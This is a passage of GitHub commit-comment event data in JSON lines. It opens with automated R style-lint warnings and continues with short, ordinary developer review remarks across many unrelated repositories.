tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:72:15:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n             ~^~~\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:75:22:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:77:53:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L79) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:80:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L80) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n^\n```\n[R/generateArtificialData.R:80:13:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n[R/generateArtificialData.R:82:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L82) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(output)\n^\n```\n[R/generateArtificialData.R:83:16:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n              ~^~~\n```\n[R/generateArtificialData.R:83:32:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n                              ~^~\n```\n[R/generateArtificialData.R:83:61:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n                                                           ~^~\n```\n[R/generateArtificialData.R:87:1:](https://github.com/thijsjanzen/STEPCAM/blob/5ab29d94a832f5afca1dc93c4d9c8fc60be0a49e/R/generateArtificialData.R#L87) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n"}},"created_at":"2016-09-20T11:26:29Z"}
{"id":"4589034609","type":"CommitCommentEvent","actor":{"login":"tavisca-akatte"},"repo":{"name":"tavisca-nmandge/HotelSearchWCF"},"payload":{"comment":{"id":19094497,"position":5,"line":13,"path":"HotelBookingService/Implimentation/HotelListSecondDataResponse.cs","commit_id":"9c2f4ea2e6925be4c3d61adcf001abbfa49b998c","created_at":"2016-09-20T11:26:40Z","updated_at":"2016-09-20T11:26:40Z","body":"Avoid typos. "}},"created_at":"2016-09-20T11:26:40Z"}
{"id":"4589035740","type":"CommitCommentEvent","actor":{"login":"NiLSPACE"},"repo":{"name":"cuberite/plugin-repository"},"payload":{"comment":{"id":19094501,"position":null,"line":null,"path":null,"commit_id":"9c0ee8f8bb72ab69d40d1acefc95c0049944222f","created_at":"2016-09-20T11:26:55Z","updated_at":"2016-09-20T11:26:55Z","body":"The DownloadCount gives an error here: https://plugins.cuberite.org/showplugin.php?id=8374982"}},"created_at":"2016-09-20T11:26:55Z"}
{"id":"4589038281","type":"CommitCommentEvent","actor":{"login":"tavisca-akatte"},"repo":{"name":"tavisca-nmandge/HotelSearchWCF"},"payload":{"comment":{"id":19094506,"position":6,"line":13,"path":"HotelBookingService/Model/Services/RoomService.svc.cs","commit_id":"9c2f4ea2e6925be4c3d61adcf001abbfa49b998c","created_at":"2016-09-20T11:27:31Z","updated_at":"2016-09-20T11:27:31Z","body":"Remove commented code if not useful."}},"created_at":"2016-09-20T11:27:31Z"}
{"id":"4589040762","type":"CommitCommentEvent","actor":{"login":"sileshn"},"repo":{"name":"rahulsnair/android_device_motorola_athene"},"payload":{"comment":{"id":19094514,"position":4,"line":0,"path":"BoardConfig.mk","commit_id":"4e2ff4f7a944244d258b53ee38b2bc651cecef0a","created_at":"2016-09-20T11:28:07Z","updated_at":"2016-09-20T11:28:07Z","body":"Try after changing this line to the original one"}},"created_at":"2016-09-20T11:28:07Z"}
{"id":"4589041174","type":"CommitCommentEvent","actor":{"login":"schnittstabil"},"repo":{"name":"sindresorhus/is-empty-iterable"},"payload":{"comment":{"id":19094516,"position":11,"line":11,"path":"test.js","commit_id":"fcdafe2ff4b5ec47de2b25f5c201e287215a4fd9","created_at":"2016-09-20T11:28:12Z","updated_at":"2016-09-20T11:28:12Z","body":"> Those are not the same things\r\n\r\nTrue, but as `function * g() {}` is a *Generator Function*, `g()` returns a *Generator Object*, which in turn is an *Iterable*:\r\n\r\n[25.3 Generator Objects](http://www.ecma-international.org/ecma-262/6.0/#sec-generator-objects):\r\n> A Generator object is an instance of a generator function and conforms to both the Iterator and Iterable interfaces."}},"created_at":"2016-09-20T11:28:12Z"}
{"id":"4589043117","type":"CommitCommentEvent","actor":{"login":"lunarpulse"},"repo":{"name":"lunarpulse/ucxl"},"payload":{"comment":{"id":19094519,"position":null,"line":null,"path":null,"commit_id":"36861d7941e282277b8ade670a2a9c502f8c4413","created_at":"2016-09-20T11:28:40Z","updated_at":"2016-09-20T11:28:40Z","body":"SLow and very noisy no filter. so added Robert Mahony non-linear filter to stabilise it"}},"created_at":"2016-09-20T11:28:40Z"}
{"id":"4589043546","type":"CommitCommentEvent","actor":{"login":"grudus"},"repo":{"name":"kubukoz/trellocat"},"payload":{"comment":{"id":19094523,"position":null,"line":null,"path":null,"commit_id":"0036689e74c3f12a07756d49cc435db568fe1d12","created_at":"2016-09-20T11:28:46Z","updated_at":"2016-09-20T11:28:46Z","body":"fajne"}},"created_at":"2016-09-20T11:28:46Z"}
{"id":"4589043633","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19094524,"position":12,"line":312,"path":"src/FffGcodeWriter.cpp","commit_id":"228b13c96c59592c176075daae290eb52b7e503c","created_at":"2016-09-20T11:28:47Z","updated_at":"2016-09-20T11:28:47Z","body":"Hate how the Infill class behaves like a factory, yet still has this humongous constructor full of traps. A factory pattern prevents this by setting all these properties after construction, so that it is clear which is which.\r\n\r\n(Not blocking.)"}},"created_at":"2016-09-20T11:28:47Z"}
{"id":"4589044491","type":"CommitCommentEvent","actor":{"login":"elazarg"},"repo":{"name":"python/mypy"},"payload":{"comment":{"id":19094525,"position":16,"line":843,"path":"mypy/test/data/check-classes.test","commit_id":"9dd1086e76c4d62011c2ff1479abae30565c6db2","created_at":"2016-09-20T11:29:00Z","updated_at":"2016-09-20T11:29:00Z","body":"Sounds good to me. Except for one thing - I see a problem with overloading+inheritance, and I see a (seemingly unfixable) problem with reversed operators. I don't understand where is the problem with the combination of overloading and reverse operators."}},"created_at":"2016-09-20T11:29:00Z"}
{"id":"4589046369","type":"CommitCommentEvent","actor":{"login":"florianf"},"repo":{"name":"MobiDevelop/robovm"},"payload":{"comment":{"id":19094531,"position":null,"line":null,"path":null,"commit_id":"9fb578b40b01032ac5f08c11fde16d3b59f0f663","created_at":"2016-09-20T11:29:27Z","updated_at":"2016-09-20T11:29:27Z","body":"I see, thanks for the pointer. Fixed it."}},"created_at":"2016-09-20T11:29:27Z"}
{"id":"4589048054","type":"CommitCommentEvent","actor":{"login":"kubukoz"},"repo":{"name":"kubukoz/trellocat"},"payload":{"comment":{"id":19094536,"position":null,"line":null,"path":null,"commit_id":"0036689e74c3f12a07756d49cc435db568fe1d12","created_at":"2016-09-20T11:29:50Z","updated_at":"2016-09-20T11:29:50Z","body":"dobra zmiana"}},"created_at":"2016-09-20T11:29:50Z"}
{"id":"4589048398","type":"CommitCommentEvent","actor":{"login":"tavisca-akatte"},"repo":{"name":"tavisca-nmandge/HotelSearchWCF"},"payload":{"comment":{"id":19094540,"position":16,"line":48,"path":"HotelBookingService/Model/Services/HotelDataResponse.svc.cs","commit_id":"1be2465a7e576be4a43e26ebb7eaa7d54cc3c927","created_at":"2016-09-20T11:29:55Z","updated_at":"2016-09-20T11:29:55Z","body":"Variable names should be meaningful.\r\nhere tasklistxml doesn't show variable purpose."}},"created_at":"2016-09-20T11:29:55Z"}
{"id":"4589049144","type":"CommitCommentEvent","actor":{"login":"KrisBoonefaes"},"repo":{"name":"icapps/ios-faro"},"payload":{"comment":{"id":19094546,"position":62,"line":84,"path":"README.md","commit_id":"1475f99601874b73959e7f4836e2af03ed7254a0","created_at":"2016-09-20T11:30:06Z","updated_at":"2016-09-20T11:30:06Z","body":"mapRelations lijkt mij dan nog beter te conformeren naar de guideline om functions met werkwoorden te laten beginnen https://swift.org/documentation/api-design-guidelines/#promote-clear-usage"}},"created_at":"2016-09-20T11:30:06Z"}
{"id":"4589049567","type":"CommitCommentEvent","actor":{"login":"nmwalker360"},"repo":{"name":"nmwalker360/IFB299-Work"},"payload":{"comment":{"id":19094547,"position":null,"line":null,"path":null,"commit_id":"2e20750c965e01d855aa4d2e0e002bbb1a4b273e","created_at":"2016-09-20T11:30:12Z","updated_at":"2016-09-20T11:30:12Z","body":"\r\n[terms.zip](https://github.com/nmwalker360/IFB299-Work/files/482402/terms.zip)\r\n"}},"created_at":"2016-09-20T11:30:12Z"}
{"id":"4589051566","type":"CommitCommentEvent","actor":{"login":"blambov"},"repo":{"name":"mkjellman/cassandra"},"payload":{"comment":{"id":19094554,"position":52,"line":171,"path":"src/java/org/apache/cassandra/io/sstable/SSTableScanner.java","commit_id":"e5389378b19eb03de7dd4d50d6df110c68057985","created_at":"2016-09-20T11:30:39Z","updated_at":"2016-09-20T11:30:39Z","body":"This appears to be new hence incompatible with pre-Birch formats."}},"created_at":"2016-09-20T11:30:39Z"}
{"id":"4589051904","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19094557,"position":null,"line":null,"path":null,"commit_id":"5a5b672682aed9bbd7962d46b57e4e56a56cbce9","created_at":"2016-09-20T11:30:44Z","updated_at":"2016-09-20T11:30:44Z","body":"@zmwangx You've lost me, doesn't this fix the link while moving the file?"}},"created_at":"2016-09-20T11:30:44Z"}
{"id":"4589054828","type":"CommitCommentEvent","actor":{"login":"Antoniii"},"repo":{"name":"dead-pine-inc/book-of-the-idea-out"},"payload":{"comment":{"id":19094563,"position":null,"line":null,"path":null,"commit_id":"e0731720a15b5660b00e68c66a161a5c3f95f44f","created_at":"2016-09-20T11:31:24Z","updated_at":"2016-09-20T11:31:24Z","body":"Так и задумано - это пасхалка)"}},"created_at":"2016-09-20T11:31:24Z"}
{"id":"4589055315","type":"CommitCommentEvent","actor":{"login":"auhlig"},"repo":{"name":"vishvesh/openstack4j"},"payload":{"comment":{"id":19094567,"position":43,"line":111,"path":"core-test/src/main/java/org/openstack4j/api/tacker/v1/TackerVimTests.java","commit_id":"6160624e2fd1879139a477cb7682e097aad2a682","created_at":"2016-09-20T11:31:30Z","updated_at":"2016-09-20T11:31:30Z","body":":)"}},"created_at":"2016-09-20T11:31:30Z"}
{"id":"4589056683","type":"CommitCommentEvent","actor":{"login":"joeeasy"},"repo":{"name":"joeeasy/hello-world"},"payload":{"comment":{"id":19094573,"position":null,"line":null,"path":null,"commit_id":"2cf6b3d21f1bd9ea58f83c55d949876f1476bcc7","created_at":"2016-09-20T11:31:47Z","updated_at":"2016-09-20T11:31:47Z","body":"I LOve to program, but sometimes i feel i'm just alone. I'm happy to discover github and i'm here to make the best use of her service"}},"created_at":"2016-09-20T11:31:47Z"}
{"id":"4589058214","type":"CommitCommentEvent","actor":{"login":"tavisca-akatte"},"repo":{"name":"tavisca-nmandge/HotelSearchWCF"},"payload":{"comment":{"id":19094578,"position":34,"line":20,"path":"HotelBookingService/Implimentation/HotelListFirstDataResponse.cs","commit_id":"8483fff17e122b8a02a111c9ecee73da52c0ae50","created_at":"2016-09-20T11:32:06Z","updated_at":"2016-09-20T11:32:06Z","body":"Read coding conventions from below url,\r\nhttp://www.dofactory.com/reference/csharp-coding-standards"}},"created_at":"2016-09-20T11:32:06Z"}
{"id":"4589058603","type":"CommitCommentEvent","actor":{"login":"dzavalishin"},"repo":{"name":"dzavalishin/phantomuserland"},"payload":{"comment":{"id":19094580,"position":15,"line":275,"path":"etc/experiments/cpfs/cpfs_fsck.c","commit_id":"b1d0cecda4fefd0f10da39c16b5a61308f7529ef","created_at":"2016-09-20T11:32:11Z","updated_at":"2016-09-20T11:32:11Z","body":"NB! Inode  pointer is invalid after  cpfs_unlock_ino( fs, ino );"}},"created_at":"2016-09-20T11:32:11Z"}
{"id":"4589059070","type":"CommitCommentEvent","actor":{"login":"Ninavdk"},"repo":{"name":"Ninavdk/avdk"},"payload":{"comment":{"id":19094583,"position":null,"line":null,"path":null,"commit_id":"72710ba85d2dfada0021103600f3dbe3f991fb36","created_at":"2016-09-20T11:32:17Z","updated_at":"2016-09-20T11:32:17Z","body":"commit"}},"created_at":"2016-09-20T11:32:17Z"}
{"id":"4589060843","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19094589,"position":null,"line":null,"path":null,"commit_id":"5a5b672682aed9bbd7962d46b57e4e56a56cbce9","created_at":"2016-09-20T11:32:40Z","updated_at":"2016-09-20T11:32:40Z","body":"@MikeMcQuaid \r\n\r\n```\r\n$ grep -rI '\\.github/CONTRIBUTING.md'\r\n.github/ISSUE_TEMPLATE.md:**Please note by far the quickest way to get a new formula into Homebrew is to file a [Pull Request](https://github.com/Homebrew/homebrew-core/blob/master/.github/CONTRIBUTING.md).**\r\n.github/PULL_REQUEST_TEMPLATE.md:- [ ] Have you followed the guidelines in our [Contributing](https://github.com/Homebrew/homebrew-core/blob/master/.github/CONTRIBUTING.md) document?\r\n```"}},"created_at":"2016-09-20T11:32:40Z"}
{"id":"4589061561","type":"CommitCommentEvent","actor":{"login":"YaroslavW"},"repo":{"name":"YaroslavW/JavaScript"},"payload":{"comment":{"id":19094590,"position":null,"line":null,"path":null,"commit_id":"470a4b13721616e886eb22bdb83a616ee0c63222","created_at":"2016-09-20T11:32:50Z","updated_at":"2016-09-20T11:32:50Z","body":", у такой проверки есть две особенности:\r\n\r\nПустая строка и строка из пробельных символов преобразуются к 0, поэтому считаются числами.\r\nЕсли применить такую проверку не к строке, то могут быть сюрпризы, в частности isNaN посчитает числами значения false, true, null, так как они хотя и не числа, но преобразуются к ним.\r\nЕсли же нужна действительно точная проверка на число, которая не считает числом строку из пробелов, логические и специальные значения, а также отсекает Infinity – используйте следующую функцию isNumeric:\r\n\r\nfunction isNumeric(n) {\r\n  return !isNaN(parseFloat(n)) && isFinite(n);\r\n}"}},"created_at":"2016-09-20T11:32:50Z"}
{"id":"4589062317","type":"CommitCommentEvent","actor":{"login":"p-muessig"},"repo":{"name":"e2ebridge/xslt4node"},"payload":{"comment":{"id":19094592,"position":null,"line":null,"path":null,"commit_id":"e46190f7401f5b9479b45ad3337398737b6645f3","created_at":"2016-09-20T11:32:59Z","updated_at":"2016-09-20T11:32:59Z","body":"Fixed with version 0.3.2."}},"created_at":"2016-09-20T11:32:59Z"}
{"id":"4589064881","type":"CommitCommentEvent","actor":{"login":"mtorrisi"},"repo":{"name":"FutureGateway/APIServer"},"payload":{"comment":{"id":19094598,"position":null,"line":null,"path":null,"commit_id":"5d6053b7a83eb0b7130bb328641bfa1fffba5d5d","created_at":"2016-09-20T11:33:36Z","updated_at":"2016-09-20T11:33:36Z","body":"All comments to this commit were fixed in the commit: 9ec40845b146528a4bd85ff9c3ebce15d7cebe4e"}},"created_at":"2016-09-20T11:33:36Z"}
{"id":"4589065231","type":"CommitCommentEvent","actor":{"login":"Shul3"},"repo":{"name":"Shul3/myProject"},"payload":{"comment":{"id":19094600,"position":null,"line":null,"path":null,"commit_id":"750498c662c13f8925851406eec0374767dea31f","created_at":"2016-09-20T11:33:41Z","updated_at":"2016-09-20T11:33:41Z","body":"wwwww"}},"created_at":"2016-09-20T11:33:41Z"}
{"id":"4589066388","type":"CommitCommentEvent","actor":{"login":"orbincm"},"repo":{"name":"orbincm/Comprensi-n-Lectora-Grado-3"},"payload":{"comment":{"id":19094602,"position":null,"line":null,"path":null,"commit_id":"bdd94d78ea18b0c66aba0a1aa3e6929c750d8597","created_at":"2016-09-20T11:33:59Z","updated_at":"2016-09-20T11:33:59Z","body":"aprendiendo a leer"}},"created_at":"2016-09-20T11:33:59Z"}
{"id":"4589067739","type":"CommitCommentEvent","actor":{"login":"Wedsa95"},"repo":{"name":"Wedsa95/test"},"payload":{"comment":{"id":19094608,"position":1,"line":1,"path":"README.md","commit_id":"e8bcdb8c10c442fec6374da4eaf3114970ca1478","created_at":"2016-09-20T11:34:18Z","updated_at":"2016-09-20T11:34:18Z","body":"ja ja\r\n"}},"created_at":"2016-09-20T11:34:18Z"}
{"id":"4589068254","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19094610,"position":null,"line":null,"path":null,"commit_id":"5a5b672682aed9bbd7962d46b57e4e56a56cbce9","created_at":"2016-09-20T11:34:25Z","updated_at":"2016-09-20T11:34:25Z","body":"@zmwangx TextMate search 😭 https://github.com/Homebrew/homebrew-core/commit/37f8c5f736e9e238a882522e7e1bed6fd7e8f923 and https://github.com/Homebrew/homebrew-core/commit/d04e7ad28e6adab82bb0e27b63e47594d7b045a8"}},"created_at":"2016-09-20T11:34:25Z"}
{"id":"4589070312","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19094616,"position":null,"line":null,"path":null,"commit_id":"5a5b672682aed9bbd7962d46b57e4e56a56cbce9","created_at":"2016-09-20T11:34:54Z","updated_at":"2016-09-20T11:34:54Z","body":"Gotta get a better text editor 😉 "}},"created_at":"2016-09-20T11:34:54Z"}
{"id":"4589070642","type":"CommitCommentEvent","actor":{"login":"lfairy"},"repo":{"name":"lfairy/maud"},"payload":{"comment":{"id":19094618,"position":null,"line":null,"path":null,"commit_id":"9c35cc557e433fb466ec717770bbd54b060e4ca9","created_at":"2016-09-20T11:34:59Z","updated_at":"2016-09-20T11:34:59Z","body":"I'll publish them once I fix up the docs for the new release."}},"created_at":"2016-09-20T11:34:59Z"}
{"id":"4589073818","type":"CommitCommentEvent","actor":{"login":"n9ti"},"repo":{"name":"Sellsuki/js-array-playground"},"payload":{"comment":{"id":19094625,"position":null,"line":null,"path":null,"commit_id":"9e664ad5bf0c5d37dbe6fde46a8ed56f7ce47eb6","created_at":"2016-09-20T11:35:44Z","updated_at":"2016-09-20T11:35:44Z","body":"closes #3 "}},"created_at":"2016-09-20T11:35:44Z"}
{"id":"4589076062","type":"CommitCommentEvent","actor":{"login":"KristinaDrashkova"},"repo":{"name":"KristinaDrashkova/exercise-repo"},"payload":{"comment":{"id":19094633,"position":2,"line":2,"path":"README.md","commit_id":"aa5cb326efa7478da183cfa02be5e64ddfda1d65","created_at":"2016-09-20T11:36:18Z","updated_at":"2016-09-20T11:36:18Z","body":"hello"}},"created_at":"2016-09-20T11:36:18Z"}
{"id":"4589077268","type":"CommitCommentEvent","actor":{"login":"andrebola"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19094638,"position":null,"line":null,"path":null,"commit_id":"0fa36f20c80b2128b88715020136babd15e4055d","created_at":"2016-09-20T11:36:34Z","updated_at":"2016-09-20T11:36:34Z","body":"The pack with more sounds has 695 and all the process took 8 seconds."}},"created_at":"2016-09-20T11:36:34Z"}
{"id":"4589080900","type":"CommitCommentEvent","actor":{"login":"git-marijus"},"repo":{"name":"redmatrix/hubzilla"},"payload":{"comment":{"id":19094646,"position":8,"line":448,"path":"include/features.php","commit_id":"0cba82ce9c23ea4db141d2d5db3dcfcb4a4fe7dc","created_at":"2016-09-20T11:37:25Z","updated_at":"2016-09-20T11:37:25Z","body":"Yeah... The settins page for pro:basic looked kind of funky... Could have fixed it in the template but thought it would be better to fix it here...\r\n\r\nI'll remove the mentioned for loop..."}},"created_at":"2016-09-20T11:37:25Z"}
{"id":"4589082503","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19094650,"position":11,"line":56,"path":"core/reflection.jvm/src/kotlin/reflect/jvm/internal/KFunctionImpl.kt","commit_id":"e7e54d571f49ddc0af2c0ca069ac1e52a8e7d676","created_at":"2016-09-20T11:37:48Z","updated_at":"2016-09-20T11:37:48Z","body":"I'd prefer named argument for `false` here"}},"created_at":"2016-09-20T11:37:48Z"}
{"id":"4589083389","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/XMLTV-Import"},"payload":{"comment":{"id":19094651,"position":null,"line":null,"path":null,"commit_id":"88ca59a3aa3857a3c950fcf2d193d319869a9db8","created_at":"2016-09-20T11:38:00Z","updated_at":"2016-09-20T11:38:00Z","body":"i suspected the server/url which has no dns but a ipv4 adress.\r\nNow it works again - thx.\r\n"}},"created_at":"2016-09-20T11:38:00Z"}
{"id":"4589087358","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19094659,"position":73,"line":130,"path":"src/Control/TimeWarp/Timed/MonadTimed.hs","commit_id":"f352b1665caa13a32784c753d7cd014feb2be966","created_at":"2016-09-20T11:38:54Z","updated_at":"2016-09-20T11:38:54Z","body":"Why eliminate?"}},"created_at":"2016-09-20T11:38:54Z"}
